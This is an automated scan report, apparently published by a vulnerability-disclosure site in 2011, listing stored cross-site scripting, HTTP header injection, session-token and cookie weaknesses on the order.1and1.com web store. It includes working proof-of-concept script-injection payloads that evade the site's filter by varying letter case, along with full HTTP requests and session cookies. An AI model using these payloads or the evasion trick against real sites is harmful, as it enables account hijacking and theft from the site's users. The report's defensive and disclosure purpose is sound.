Stored XSS, Permanent Cross Site Scripting, order.1and1.com, DORK, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Mar 20 13:56:02 CDT 2011.


1. Cross-site scripting (stored)

Stored XSS in order.1and1.com, DORK, Stored Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://order.1and1.com/xml/order/CloudDynamicServer [REST URL parameter 3]

1.2. http://order.1and1.com/xml/order/DomaininfoMove [REST URL parameter 3]

1.3. http://order.1and1.com/xml/order/Eshops [REST URL parameter 3]

1.4. http://order.1and1.com/xml/order/FeatureDatabaseDatabase [REST URL parameter 3]

1.5. http://order.1and1.com/xml/order/FeatureEmailEmail [REST URL parameter 3]

1.6. http://order.1and1.com/xml/order/FeatureEmailWebmail [REST URL parameter 3]

1.7. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback [REST URL parameter 3]

1.8. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch [REST URL parameter 3]

1.9. http://order.1and1.com/xml/order/FeatureMarketingCtrStat [REST URL parameter 3]

1.10. http://order.1and1.com/xml/order/FeatureSite-buildingCgi [REST URL parameter 3]

1.11. http://order.1and1.com/xml/order/FeatureSite-buildingDsc [REST URL parameter 3]

1.12. http://order.1and1.com/xml/order/FeatureSite-buildingElements [REST URL parameter 3]

1.13. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery [REST URL parameter 3]

1.14. http://order.1and1.com/xml/order/FeatureSite-buildingWsb [REST URL parameter 3]

1.15. http://order.1and1.com/xml/order/Gtc [REST URL parameter 3]

1.16. http://order.1and1.com/xml/order/Home [REST URL parameter 3]

1.17. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

1.18. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

1.19. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

1.20. http://order.1and1.com/xml/order/Instant [REST URL parameter 3]

1.21. http://order.1and1.com/xml/order/MailInstantMail [REST URL parameter 3]

1.22. http://order.1and1.com/xml/order/MsHosting [REST URL parameter 3]

1.23. http://order.1and1.com/xml/order/Service [REST URL parameter 3]

1.24. http://order.1and1.com/xml/order/Sharepoint [REST URL parameter 3]

1.25. http://order.1and1.com/xml/order/VirtualServerL [REST URL parameter 3]

1.26. http://order.1and1.com/xml/order/popupDomainPrices [REST URL parameter 3]

2. HTTP header injection

2.1. http://order.1and1.com/xml/order/Jumpto [jsessionid parameter]

2.2. http://order.1and1.com/xml/order/Jumpto [linkId parameter]

2.3. http://order.1and1.com/xml/order/Jumpto [linkOrigin parameter]

2.4. http://order.1and1.com/xml/order/Jumpto [name of an arbitrarily supplied request parameter]

2.5. http://order.1and1.com/xml/order/Jumpto [origin.page parameter]

2.6. http://order.1and1.com/xml/order/Jumpto [page parameter]

2.7. http://order.1and1.com/xml/order/Jumpto [site parameter]

2.8. http://order.1and1.com/xml/order/Jumpto [sourcearea parameter]

2.9. http://order.1and1.com/xml/order/domaincheck [__lf parameter]

2.10. http://order.1and1.com/xml/order/domaincheck [jsessionid parameter]

2.11. http://order.1and1.com/xml/order/tariffselect [__lf parameter]

2.12. http://order.1and1.com/xml/order/tariffselect [jsessionid parameter]

3. Session token in URL

3.1. http://order.1and1.com/links

3.2. http://order.1and1.com/xml/order

3.3. http://order.1and1.com/xml/order/AboutUs

3.4. http://order.1and1.com/xml/order/CloudDynamicServer

3.5. http://order.1and1.com/xml/order/CloudDynamicServer

3.6. http://order.1and1.com/xml/order/Contact

3.7. http://order.1and1.com/xml/order/Domaininfo

3.8. http://order.1and1.com/xml/order/DomaininfoMove

3.9. http://order.1and1.com/xml/order/Eshops

3.10. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

3.11. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

3.12. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

3.13. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

3.14. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

3.15. http://order.1and1.com/xml/order/FeatureControlCenter

3.16. http://order.1and1.com/xml/order/FeatureDatabaseAccess

3.17. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

3.18. http://order.1and1.com/xml/order/FeatureDatabaseMssql

3.19. http://order.1and1.com/xml/order/FeatureDomainDns

3.20. http://order.1and1.com/xml/order/FeatureDomainDomains

3.21. http://order.1and1.com/xml/order/FeatureDomainPdr

3.22. http://order.1and1.com/xml/order/FeatureDreamweaver

3.23. http://order.1and1.com/xml/order/FeatureEmailEmail

3.24. http://order.1and1.com/xml/order/FeatureEmailVirusscan

3.25. http://order.1and1.com/xml/order/FeatureEmailWebmail

3.26. http://order.1and1.com/xml/order/FeatureFtpBackup

3.27. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

3.28. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

3.29. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

3.30. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

3.31. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

3.32. http://order.1and1.com/xml/order/FeatureParallelsPlesk

3.33. http://order.1and1.com/xml/order/FeatureParallelsSB

3.34. http://order.1and1.com/xml/order/FeatureSecurityCertificate

3.35. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

3.36. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

3.37. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

3.38. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

3.39. http://order.1and1.com/xml/order/FeatureServerFirewall

3.40. http://order.1and1.com/xml/order/FeatureServerHarddrive

3.41. http://order.1and1.com/xml/order/FeatureServerMonitoring

3.42. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

3.43. http://order.1and1.com/xml/order/FeatureServerProcessor

3.44. http://order.1and1.com/xml/order/FeatureServerRecovery

3.45. http://order.1and1.com/xml/order/FeatureServerSsl

3.46. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux

3.47. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows

3.48. http://order.1and1.com/xml/order/FeatureSite-buildingAsp

3.49. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

3.50. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

3.51. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

3.52. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

3.53. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

3.54. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

3.55. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

3.56. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

3.57. http://order.1and1.com/xml/order/FeatureSite-buildingElements

3.58. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

3.59. http://order.1and1.com/xml/order/FeatureSite-buildingMap

3.60. http://order.1and1.com/xml/order/FeatureSite-buildingNet

3.61. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

3.62. http://order.1and1.com/xml/order/FeatureSite-buildingRss

3.63. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

3.64. http://order.1and1.com/xml/order/FeatureToolsRatepoint

3.65. http://order.1and1.com/xml/order/FeatureWebdesignIstock

3.66. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

3.67. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

3.68. http://order.1and1.com/xml/order/FirstWebsite

3.69. http://order.1and1.com/xml/order/Gtc

3.70. http://order.1and1.com/xml/order/Home

3.71. http://order.1and1.com/xml/order/Home

3.72. http://order.1and1.com/xml/order/Hosting

3.73. http://order.1and1.com/xml/order/Hosting

3.74. http://order.1and1.com/xml/order/Instant

3.75. http://order.1and1.com/xml/order/International

3.76. http://order.1and1.com/xml/order/Jumpto

3.77. http://order.1and1.com/xml/order/LocalSubmission

3.78. http://order.1and1.com/xml/order/Mail

3.79. http://order.1and1.com/xml/order/Mail

3.80. http://order.1and1.com/xml/order/MailInstantMail

3.81. http://order.1and1.com/xml/order/MailXchange

3.82. http://order.1and1.com/xml/order/MicrosoftExchange

3.83. http://order.1and1.com/xml/order/Moneyback

3.84. http://order.1and1.com/xml/order/MsHosting

3.85. http://order.1and1.com/xml/order/MsHosting

3.86. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

3.87. http://order.1and1.com/xml/order/News

3.88. http://order.1and1.com/xml/order/News

3.89. http://order.1and1.com/xml/order/PrivacyPolicy

3.90. http://order.1and1.com/xml/order/Server

3.91. http://order.1and1.com/xml/order/Server

3.92. http://order.1and1.com/xml/order/ServerPremium

3.93. http://order.1and1.com/xml/order/Service

3.94. http://order.1and1.com/xml/order/Sharepoint

3.95. http://order.1and1.com/xml/order/TcSpecialOffers

3.96. http://order.1and1.com/xml/order/TellAFriend

3.97. http://order.1and1.com/xml/order/VirtualServer

3.98. http://order.1and1.com/xml/order/VirtualServer

3.99. http://order.1and1.com/xml/order/VirtualServerL

3.100. http://order.1and1.com/xml/order/VirtualServerL

3.101. http://order.1and1.com/xml/order/VirtualServerXL

3.102. http://order.1and1.com/xml/order/VirtualServerXXL

3.103. http://order.1and1.com/xml/order/a

3.104. http://order.1and1.com/xml/order/addon

3.105. http://order.1and1.com/xml/order/costs

3.106. http://order.1and1.com/xml/order/domaincheck

3.107. http://order.1and1.com/xml/order/domaincheck

3.108. http://order.1and1.com/xml/order/eshopupselling

3.109. http://order.1and1.com/xml/order/eshopupselling

3.110. http://order.1and1.com/xml/order/popupDomainPrices

3.111. http://order.1and1.com/xml/order/popupDomainPrices

3.112. http://order.1and1.com/xml/order/popupGreenPower

3.113. http://order.1and1.com/xml/order/popupPayPalInfo

3.114. http://order.1and1.com/xml/order/popupServerOsCds

3.115. http://order.1and1.com/xml/order/popupServerOsVps

3.116. http://order.1and1.com/xml/order/popupTcGoogleAdwords

3.117. http://order.1and1.com/xml/order/popupWebsiteMagazine

3.118. http://order.1and1.com/xml/order/sitedesign

3.119. http://order.1and1.com/xml/order/tariffselect

3.120. http://order.1and1.com/xml/webservice/VDSPriceService

4. Cross-domain Referer leakage

4.1. http://order.1and1.com/xml/order/CloudDynamicServer

4.2. http://order.1and1.com/xml/order/Eshops

4.3. http://order.1and1.com/xml/order/FeatureSite-buildingMap

4.4. http://order.1and1.com/xml/order/Home

4.5. http://order.1and1.com/xml/order/Hosting

4.6. http://order.1and1.com/xml/order/Instant

4.7. http://order.1and1.com/xml/order/LocalSubmission

4.8. http://order.1and1.com/xml/order/Mail

4.9. http://order.1and1.com/xml/order/MailInstantMail

4.10. http://order.1and1.com/xml/order/MailXchange

4.11. http://order.1and1.com/xml/order/MicrosoftExchange

4.12. http://order.1and1.com/xml/order/MsHosting

4.13. http://order.1and1.com/xml/order/Server

4.14. http://order.1and1.com/xml/order/ServerPremium

4.15. http://order.1and1.com/xml/order/Sharepoint

4.16. http://order.1and1.com/xml/order/VirtualServer

4.17. http://order.1and1.com/xml/order/VirtualServerL

4.18. http://order.1and1.com/xml/order/eshopupselling

5. Cookie without HttpOnly flag set

5.1. http://order.1and1.com/xml/order

5.2. http://order.1and1.com/xml/order

5.3. http://order.1and1.com/xml/order/AboutUs

5.4. http://order.1and1.com/xml/order/AboutUs

5.5. http://order.1and1.com/xml/order/CloudDynamicServer

5.6. http://order.1and1.com/xml/order/CloudDynamicServer

5.7. http://order.1and1.com/xml/order/Contact

5.8. http://order.1and1.com/xml/order/Domaininfo

5.9. http://order.1and1.com/xml/order/Domaininfo

5.10. http://order.1and1.com/xml/order/DomaininfoMove

5.11. http://order.1and1.com/xml/order/DomaininfoMove

5.12. http://order.1and1.com/xml/order/Eshops

5.13. http://order.1and1.com/xml/order/Eshops

5.14. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

5.15. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

5.16. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

5.17. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

5.18. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

5.19. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

5.20. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

5.21. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

5.22. http://order.1and1.com/xml/order/FeatureControlCenter

5.23. http://order.1and1.com/xml/order/FeatureControlCenter

5.24. http://order.1and1.com/xml/order/FeatureDatabaseAccess

5.25. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

5.26. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

5.27. http://order.1and1.com/xml/order/FeatureDatabaseMssql

5.28. http://order.1and1.com/xml/order/FeatureDomainDns

5.29. http://order.1and1.com/xml/order/FeatureDomainDns

5.30. http://order.1and1.com/xml/order/FeatureDomainDomains

5.31. http://order.1and1.com/xml/order/FeatureDomainDomains

5.32. http://order.1and1.com/xml/order/FeatureDomainPdr

5.33. http://order.1and1.com/xml/order/FeatureDomainPdr

5.34. http://order.1and1.com/xml/order/FeatureDreamweaver

5.35. http://order.1and1.com/xml/order/FeatureDreamweaver

5.36. http://order.1and1.com/xml/order/FeatureEmailEmail

5.37. http://order.1and1.com/xml/order/FeatureEmailEmail

5.38. http://order.1and1.com/xml/order/FeatureEmailVirusscan

5.39. http://order.1and1.com/xml/order/FeatureEmailVirusscan

5.40. http://order.1and1.com/xml/order/FeatureEmailWebmail

5.41. http://order.1and1.com/xml/order/FeatureEmailWebmail

5.42. http://order.1and1.com/xml/order/FeatureFtpBackup

5.43. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

5.44. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

5.45. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

5.46. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

5.47. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

5.48. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

5.49. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

5.50. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

5.51. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

5.52. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

5.53. http://order.1and1.com/xml/order/FeatureParallelsPlesk

5.54. http://order.1and1.com/xml/order/FeatureParallelsSB

5.55. http://order.1and1.com/xml/order/FeatureSecurityCertificate

5.56. http://order.1and1.com/xml/order/FeatureSecurityCertificate

5.57. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

5.58. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

5.59. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

5.60. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

5.61. http://order.1and1.com/xml/order/FeatureServerFirewall

5.62. http://order.1and1.com/xml/order/FeatureServerHarddrive

5.63. http://order.1and1.com/xml/order/FeatureServerMonitoring

5.64. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

5.65. http://order.1and1.com/xml/order/FeatureServerProcessor

5.66. http://order.1and1.com/xml/order/FeatureServerRecovery

5.67. http://order.1and1.com/xml/order/FeatureServerSsl

5.68. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux

5.69. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows

5.70. http://order.1and1.com/xml/order/FeatureSite-buildingAsp

5.71. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

5.72. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

5.73. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

5.74. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

5.75. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

5.76. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

5.77. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

5.78. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

5.79. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

5.80. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

5.81. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

5.82. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

5.83. http://order.1and1.com/xml/order/FeatureSite-buildingElements

5.84. http://order.1and1.com/xml/order/FeatureSite-buildingElements

5.85. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

5.86. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

5.87. http://order.1and1.com/xml/order/FeatureSite-buildingMap

5.88. http://order.1and1.com/xml/order/FeatureSite-buildingMap

5.89. http://order.1and1.com/xml/order/FeatureSite-buildingNet

5.90. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

5.91. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

5.92. http://order.1and1.com/xml/order/FeatureSite-buildingRss

5.93. http://order.1and1.com/xml/order/FeatureSite-buildingRss

5.94. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

5.95. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

5.96. http://order.1and1.com/xml/order/FeatureToolsRatepoint

5.97. http://order.1and1.com/xml/order/FeatureToolsRatepoint

5.98. http://order.1and1.com/xml/order/FeatureWebdesignIstock

5.99. http://order.1and1.com/xml/order/FeatureWebdesignIstock

5.100. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

5.101. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

5.102. http://order.1and1.com/xml/order/FirstWebsite

5.103. http://order.1and1.com/xml/order/FirstWebsite

5.104. http://order.1and1.com/xml/order/Gtc

5.105. http://order.1and1.com/xml/order/Gtc

5.106. http://order.1and1.com/xml/order/Home

5.107. http://order.1and1.com/xml/order/Home

5.108. http://order.1and1.com/xml/order/Hosting

5.109. http://order.1and1.com/xml/order/Hosting

5.110. http://order.1and1.com/xml/order/Instant

5.111. http://order.1and1.com/xml/order/Instant

5.112. http://order.1and1.com/xml/order/International

5.113. http://order.1and1.com/xml/order/International

5.114. http://order.1and1.com/xml/order/Jumpto

5.115. http://order.1and1.com/xml/order/Jumpto

5.116. http://order.1and1.com/xml/order/LocalSubmission

5.117. http://order.1and1.com/xml/order/LocalSubmission

5.118. http://order.1and1.com/xml/order/Mail

5.119. http://order.1and1.com/xml/order/Mail

5.120. http://order.1and1.com/xml/order/MailInstantMail

5.121. http://order.1and1.com/xml/order/MailInstantMail

5.122. http://order.1and1.com/xml/order/MailXchange

5.123. http://order.1and1.com/xml/order/MailXchange

5.124. http://order.1and1.com/xml/order/MicrosoftExchange

5.125. http://order.1and1.com/xml/order/MicrosoftExchange

5.126. http://order.1and1.com/xml/order/Moneyback

5.127. http://order.1and1.com/xml/order/Moneyback

5.128. http://order.1and1.com/xml/order/MsHosting

5.129. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

5.130. http://order.1and1.com/xml/order/Mshosting

5.131. http://order.1and1.com/xml/order/News

5.132. http://order.1and1.com/xml/order/News

5.133. http://order.1and1.com/xml/order/PrivacyPolicy

5.134. http://order.1and1.com/xml/order/PrivacyPolicy

5.135. http://order.1and1.com/xml/order/Server

5.136. http://order.1and1.com/xml/order/Server

5.137. http://order.1and1.com/xml/order/ServerPremium

5.138. http://order.1and1.com/xml/order/ServerPremium

5.139. http://order.1and1.com/xml/order/Service

5.140. http://order.1and1.com/xml/order/Service

5.141. http://order.1and1.com/xml/order/Sharepoint

5.142. http://order.1and1.com/xml/order/Sharepoint

5.143. http://order.1and1.com/xml/order/TcSpecialOffers

5.144. http://order.1and1.com/xml/order/TcSpecialOffers

5.145. http://order.1and1.com/xml/order/TellAFriend

5.146. http://order.1and1.com/xml/order/TellAFriend

5.147. http://order.1and1.com/xml/order/VirtualServer

5.148. http://order.1and1.com/xml/order/VirtualServer

5.149. http://order.1and1.com/xml/order/VirtualServerL

5.150. http://order.1and1.com/xml/order/VirtualServerL

5.151. http://order.1and1.com/xml/order/VirtualServerXL

5.152. http://order.1and1.com/xml/order/VirtualServerXXL

5.153. http://order.1and1.com/xml/order/a

5.154. http://order.1and1.com/xml/order/addon

5.155. http://order.1and1.com/xml/order/costs

5.156. http://order.1and1.com/xml/order/domaincheck

5.157. http://order.1and1.com/xml/order/domaincheck

5.158. http://order.1and1.com/xml/order/eshopupselling

5.159. http://order.1and1.com/xml/order/eshopupselling

5.160. http://order.1and1.com/xml/order/popupDomainPrices

5.161. http://order.1and1.com/xml/order/popupDomainPrices

5.162. http://order.1and1.com/xml/order/popupGreenPower

5.163. http://order.1and1.com/xml/order/popupGreenPower

5.164. http://order.1and1.com/xml/order/popupPayPalInfo

5.165. http://order.1and1.com/xml/order/popupServerOsCds

5.166. http://order.1and1.com/xml/order/popupServerOsVps

5.167. http://order.1and1.com/xml/order/popupTcGoogleAdwords

5.168. http://order.1and1.com/xml/order/popupTcGoogleAdwords

5.169. http://order.1and1.com/xml/order/popupWebsiteMagazine

5.170. http://order.1and1.com/xml/order/sitedesign

5.171. http://order.1and1.com/xml/order/tariffselect

5.172. http://order.1and1.com/xml/order/tariffselect

6. Email addresses disclosed

6.1. http://order.1and1.com/xml/order/FeatureDomainPdr

6.2. http://order.1and1.com/xml/order/International

6.3. http://order.1and1.com/xml/order/Mail

6.4. http://order.1and1.com/xml/order/MailXchange

6.5. http://order.1and1.com/xml/order/PrivacyPolicy

7. Content type incorrectly stated

1. Cross-site scripting (stored)
There are 26 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://order.1and1.com/xml/order/CloudDynamicServer [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/CloudDynamicServer is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/CloudDynamicServer. The payload be5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 was submitted in the REST URL parameter 3. This input was returned as be5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 in a subsequent request for the URL /xml/order/CloudDynamicServer.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/CloudDynamicServerbe5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:14 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=fYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyEhIB4cNTg=; Expires=Fri, 07-Apr-2079 21:08:22 GMT; Path=/
ETag: dafe46acb36a9f556844954eae96d32c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63338


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
pfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="CloudDynamicServer";UNOUNO.params.lastpage="CloudDynamicServerbe5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

1.2. http://order.1and1.com/xml/order/DomaininfoMove [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/DomaininfoMove is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/DomaininfoMove. The payload d1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 was submitted in the REST URL parameter 3. This input was returned as d1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 in a subsequent request for the URL /xml/order/DomaininfoMove.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

